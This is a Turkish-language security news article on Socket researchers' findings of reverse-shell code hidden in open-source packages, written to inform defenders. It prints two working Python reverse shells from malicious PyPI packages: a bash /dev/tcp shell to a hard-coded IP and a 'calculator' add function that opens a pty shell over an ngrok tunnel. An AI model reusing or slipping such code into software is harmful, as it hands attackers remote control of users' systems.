Kabuklar işletim sistemlerine önemli komut satırı arayüzleri sağlar. Sistem yönetimi görevleri için meşru olsa da, tehdit aktörleri tarafından silahlandırıldığında, kabuklar yetkisiz erişim, sistem kontrolü ve organizasyonel ağlar arasında veri hırsızlığı için tehlikeli yollara dönüşür.
Bu araçların kötüye kullanılması giderek daha sofistike hale geldi, kötü niyetli aktörler kabuk tekniklerini görünüşte zararsız açık kaynak paketlerine yerleştiriyor.
Son araştırmalar, NPM, PYPI, Go ve Maven ekosistemleri arasında kabuk teknikleri uygulayan sofistike tehdit aktörlerinin endişe verici bir eğilimini ortaya koyuyor.
.png
)
Bu kabuklar, saldırganların komutlar yürütmesini, dosya sistemlerine göz atmalarını ve ağların dışına duyarlı verileri aktarmasını sağlar, genellikle uzatılmış altyapıya kalıcı erişimi sürdürürken uzun süreler boyunca tespit edilmez.
Bu tekniklerin çok yönlülüğü, onları yazılım tedarik zinciri saldırılarında özellikle tehlikeli hale getirir.
Rusya’nın APT28, Vietnam’ın APT32 ve Çin’in Hafnium’u dahil olmak üzere, devlet destekli gruplar, uzlaşmış sistemlere kalıcı erişim için web kabukları kullanılarak belgelenmiştir.
Hafnium, özellikle bu saldırı metodolojilerine ulus devlet seviyesi ilgisini vurgulayarak, tehlikeye atılmış sunucular ve web uygulamaları aracılığıyla değerli ticari sırları yaymak için birçok endüstri sektöründeki ABD kuruluşlarını hedefliyor.
Soket araştırmacıları, meşru görünümlü açık kaynak paketlerinde gizlenmiş birden fazla kötü amaçlı kabuk kodu örneği belirlediler.
Büyük ölçekli tarama ve gerçek zamanlı analiz yoluyla Socket’in tehdit araştırma ekibi, saldırganların kurban sistemlerine kalıcı erişim kanalları oluştururken tespit etmek için kötü niyetli yükleri nasıl gizlediğini ortaya çıkardı.
Bulguları bu tehditlerin evrimini ve gizleme tekniklerinin artan karmaşıklığını göstermektedir.
Etki, uzlaşmış sistemler kalıcı arka kapılar olarak hizmet ettiği için, zaman içinde yanal hareket ve ayrıcalık artışını sağlayarak, tespit edilmemişse bırakılırsa felaket veri ihlallerine yol açarak, acil veri hırsızlığının ötesine uzanır.
Bilmeden savunmasız veya kötü niyetli bağımlılıkları dahil eden kuruluşlar, veri bütünlüğü ve operasyonel güvenlikleri için önemli risklerle karşı karşıyadır.
Pypi kabuk teknikleri
PYPI ekosistemindeki en ilgili keşifler, saldırganlara tam sistem kontrolü sağlayan klasik ters kabuk uygulamalarını içerir.
Bir örnek, tüm giriş/çıkışı uzak bir bağlantıya yönlendiren etkileşimli bir bash kabuğu oluşturma kodunu gösterir:-
import os
os.system("bash -c 'bash -i >& /dev/tcp/103.252.137.168/7777 0>&1'")Bu görünüşte basit kod, işletim sistemi modülünü içe aktarır ve 7777 numaralı bağlantı noktasındaki bir Vietnam IP adresine TCP bağlantısı oluşturan bir BASH komutu yürütür ve saldırgana uzatılmış sisteme tam kabuk erişimi verir.
Tipik olarak geliştirici uygulamaları için açık bırakılan standart olmayan bağlantı noktası 7777’nin kullanımı, bu saldırıyı özellikle tespitten kaçınmada etkili kılmaktadır.
NGROK tünelleme yoluyla bir ters kabuk oluştururken bir hesap makinesi işlevi olarak daha sofistike bir örnek maskeli varlıklar:-
import socket,subprocess,os
class calculator:
def add(x, y):
s=socket. Socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("2.tcp.ngrok.io",14048))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(), 2)
import pty
pty.spawn("sh")
return x + yBu aldatıcı kod, metin editörleri ve komut geçmişi de dahil olmak üzere gelişmiş işlevselliği destekleyen bir sahte terminal oluştururken girişlerin toplamını döndürür ve tespiti geleneksel güvenlik araçları için olağanüstü zorlayıcı hale getirir.
NGROK’ın bir tünel hizmeti olarak kullanılması, bağlantıyı engellemeyi zorlaştırırken, PTY modülü karmaşık terminal işlemlerini sağlayan bir “sahte terminal” oluşturur.
Soket uzmanları, tedarik zinciri güvenlik araçlarını dahil ederek, üçüncü taraf bağımlılıklar için güçlü politikalar uygulayarak ve giderek daha sofistike olan bu kabuk tabanlı saldırı risklerini en aza indirmek için düzenli incelemeler yaparak savunmaları güçlendirmeyi önermektedir.
Equip your team with real-time threat analysis With ANY.RUN’s interactive cloud sandbox -> Try 14-day Free Trial